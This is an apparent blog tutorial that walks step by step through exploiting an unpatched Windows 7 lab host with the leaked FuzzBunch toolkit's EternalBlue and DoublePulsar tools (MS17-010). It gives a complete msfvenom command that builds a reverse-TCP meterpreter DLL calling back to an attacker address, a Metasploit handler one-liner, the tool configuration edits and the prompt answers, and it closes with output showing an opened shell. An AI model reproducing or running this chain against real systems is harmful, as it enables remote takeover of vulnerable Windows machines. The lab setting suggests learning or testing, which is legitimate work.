FUZZBUNCH, msfvenom, meterpreter, and YOU!
I've read a few of the FUZZBUNCH / ETERNALBLUE / DOUBLEPULSAR tutorials, and decided to create my own. The others work, but I found one or two things that I modified, and always like to make my own notes. So diving right in...
Terms/Notes
- Target = 10.1.0.5 - Windows 7 x86
- Attacker 1 = 192.168.1.8 - Windows ~whatever~
- Attacker 2 = 172.16.1.9 - Kali Rolling
FuzzBunch is the NSA version of Metasploit, there's a ton you can do with it (I assume), but people mostly focus on the EternalBlue/DoublePulsar combination. That, in combination with Metasploit, is what I'm demonstrating here.
Setting Up Python
The setup seems to work on any instance of Windows, so the version shouldn't matter. That said, the Python and PyWin32 version do seem to matter[1].
- Python 2.6 - https://www.python.org/download/releases/2.6/
- PyWin32 v2.12 - https://sourceforge.net/projects/pywin32/files/pywin32/Build 212/
"Next -> Next -> Next -> Finished" for both of these installers
Make sure you then add Python 2.6 to your path. Right click on Computer/This PC -> Properties. Go to Advanced system settings -> Environment Variables, then scroll down in System variables until you see PATH. Edit this, and add ;c:\python26\ to the end.
Setting Up FuzzBunch
Grab FuzzBunch in .zip format from the github repo: https://github.com/misterch0c/shadowbroker
Place this on your Attacker 1 Windows Machine. I placed mine in c:\fuzzbunch. If we navigate to c:\fuzzbunch\windows we should see two files, fb.py and Fuzzbunch.xml, which we will need to edit.
Lastly, we are going to make one more modification to a file in c:\fuzzbunch\windows\fuzzbunch named deployablemanager.py. This is one that I haven't seen touched on in other guides. This file controls the defaults for the Delivery Mechanism, something we'll touch on later. It annoyed me to change it from default every time, so I fixed it.
- Comment out line 72 of fb.py
-
addplugins(fb, "ListeningPost", LP_DIR, EDFPlugin)
-
- Change the directories in line 19 and 24 in Fuzzbunch.xml to point to correct directories
- default="C:\fuzzbunch\windows\Resources"/>
- default="C:\fuzzbunch\windows\Resources"/>
- Change the default value on line 61 in fuzzbunch\deployablemanager.py from 0 to 1
- runMode = self.io.prompt_user("Mode", params=modes, default="1", gvars=self.fb.fbglobalvars)
If we now open a command window and navigate to c:\fuzzbunch\windows (or, while in the folder, hold shift -> right click -> open command window here) and type python fb.py we should be greeted with v3.5.1 of FUZZBUNCH asking us for a default target IP. Lets leave that for the moment...
Preparing DLL
As I mentioned earlier, FuzzBunch is like meterpreter. If we continue drawing parallels, EternalBlue is the exploit, and DoublePulsar is the stager[2]. We still need a payload though, something to deliver to the target. We're going to use msfvenom to create a dll that will call back to our metasploit box.
On Attacker 2 (Kali), issue the following command:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.9 LPORT=4444 -f dll --platform windows -e x86/shikata_ga_nai -a x86 -o /tmp/target.dll
To break that out:
- -p windows/meterpreter/reverse_tcp LHOST=172.16.1.9 LPORT=4444
- Set the payload to windows/meterpreter/reverse_tcp
- Set the LHOST value for the payload to our Attacker 2 (Kali) box
- Set the LPORT to be used to 4444
- --platform windows
- Use the windows platform. Not strictly necessary, but I like to define things
- -e x86/shikata_ga_nai
- Use the x86 Shikata ga nai encoder (remember, we're targeting an x86 version of Windows 7)
- -a x86
- Again, x86 version of Windows, so set the architecture to x86
- -o /tmp/target.dll
- Output the result to a file with the specified path/name
We should now have a DLL in /tmp/, move this to your Attacker 1 Windows machine. I placed this in c:/fuzzbunch/msfvenom/target.dll
Ready metasploit
We will be using the stub exploit /multi/handler to catch the shell, and need to set our payload to the same one as used in msfvenom. LPORT should already be set to 4444, but ensure it matches the msfvenom LPORT above. We can manually enter the commands, or use msfconsole -x (formerly msfcli[3]) to do the job.
msfconsole -x "use exploit/multi/handler;\
set PAYLOAD windows/meterpreter/reverse_tcp;\
set LHOST 172.16.1.9;\
set LPORT 4444;\
exploit -j"
The last line jobifies the exploit, making it run in the background as a job and wait for incoming shells. Metasploit should be all prepped
EternalBlue
Back to our Attacker 1 Windows machine running FuzzBunch. When we left off above, it was asking us for some information (Default Target IP). Lets give it that, and anything else it needs.
- Default Target IP Address: 10.1.0.5
- Default Callback IP Address: 172.16.1.9
- Use Redirection: no
- Base Log Directory: C:\fuzzbunch\windows\Logs (default)
- Project: 0 (Create new, default)
- New Project Name: eternal1 (doesn't matter, make a name)
- Set target log directory to [snip]: yes (default)
We're now sitting at the FuzzBunch command prompt
- fb > use EternalBlue
- Prompt for Variable Settings: yes (default)
At this point you will be asked to confirm a bunch of variable settings. Read through them, all of the defaults are correct for our use case though. In the future, or targeting other machines, you may want to change some of them.
Below is a summery of the questions with extraneous material removed:
[?] NetworkTimeout [60] :
[?] TargetIp [10.1.0.5] :
[?] TargetPort [445] :
[?] VerifyTarget [True] :
[?] VerifyBackdoor [True] :
[?] MaxExploitAttempts [3] :
[?] GroomAllocations [12] :
[?] Target [1] :
[?] Mode [1] :
[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[?] Destination IP [10.1.0.5] :
[?] Destination Port [445] :
[?] Execute Plugin? [Yes] :
For Target, 1 sets the target to Windows 7/2008 R2. The alternate is Windows XP (0) For Mode 1, this sets FUZZBUNCH (FB) to the Delivery Mechanism. This is the default that we changed earlier.
The very last question, execute plugin, will launch ETERNALBLUE when you hit enter. If all goes according to plan, you should see a bunch of output with [+] Eternalblue Succeeded
at the end.
DoublePulsar
Within the same console on our Attacker 1 Windows machine, type "use DoublePulsar", and again, we'll be prompted for variable settings.
- fb Special
> use DoublePulsar - Prompt for Variable Settings: yes (default)
This time, we will change two, Function we need to set to 2 (Run DLL), and DllPayload needs to be set to the path of the msfvenom dll we created earlier.
[?] NetworkTimeout [60] :
[?] TargetIp [10.1.0.5] :
[?] TargetPort [445] :
[?] Protocol [0] :
[?] Architecture [0] : (x86)
[?] Function [0] : 2
[?] DllPayload [] : c:\fuzzbunch\msfvenom\target.dll
[?] DllOrdinal [1] :
[?] ProcessName [lsass.exe] :
[?] ProcessCommandLine [] :
[?] Destination IP [110.1.0.5] :
[?] Destination Port [445] :
[?] Execute Plugin? [Yes] :
Once we hit enter on the last question, Execute Plugin, we should see several success messages, followed by [+] Doublepulsar Succeeded
Meterpreter Session
Back on Attacker 2 (Kali), we should see our jobified session receive the reverse TCP shell, send back it's stage, and open a Meterpreter session. We can then issue the sessions command to view sessions, or sessions -i [Session Number] to interact with that session.
msf exploit(handler) >
[*] Sending stage (957487 bytes) to 10.1.0.5
[*] Meterpreter session 1 opened (172.16.1.9:4444 -> 10.1.0.5:50135) at 2017-05-29 21:39:40 -0400
msf exploit(handler) >
msf exploit(handler) >
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >
We have shell on the box!
The TL;DR
- Windows
- Install Python 2.6 and PyWin32 v2.12. Add Python26 to your path.
- Place FUZZBUNCH in c:/fuzzbunch and modify files.
- Kali
msfvenom -p windows/meterpreter/reverse_tcp LHOST=172.16.1.9 LPORT=4444 -f dll --platform windows -e x86/shikata_ga_nai -a x86 -o /tmp/target.dll
- Move target.dll to Windows
msfconsole -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 172.16.1.9; set LPORT 4444; exploit -j"
- Windows
- Launch FuzzBunch (python fb.py)
- Set default IP addresses, answer NO to use redirection
- use EternalBlue - Answer no to review (defaults are fine)
- use DoublePulsar - Review the first time, and set DLL/DLL Path, then answer no on subsequent runs (values will be saved)
- Launch FuzzBunch (python fb.py)
Notes
I've used various forms of capitalization in this article (ETERNALBLUE/EternalBlue/Eternalblue). I primarily tried to use NSA format (ETERNALBLUE) for the important titles, but reverted to camelcase (EternalBlue) for readability. Even FuzzBunch seems to use different title case depending on the situation. Just addressing that I did this on purpose.
Footnotes
Edit/Update - 22 Mar 2018
Not sure if this was released when wrote this, but adding it, mostly for keyword sake.
The associated MS vulnerability is MS17-010
The associated MSF module is
exploit/windows/smb/ms17_010_eternalblue
Associated CVEs:
CVE-2017-0144
CVE-2017-0145
CVE-2017-0146
CVE-2017-0147
CVE-2017-0148
From what I've read, I'm not going around testing every combination/version I can think of. ↩︎
Maybe not 100% accurate... ↩︎
https://www.offensive-security.com/metasploit-unleashed/msfcli/ ↩︎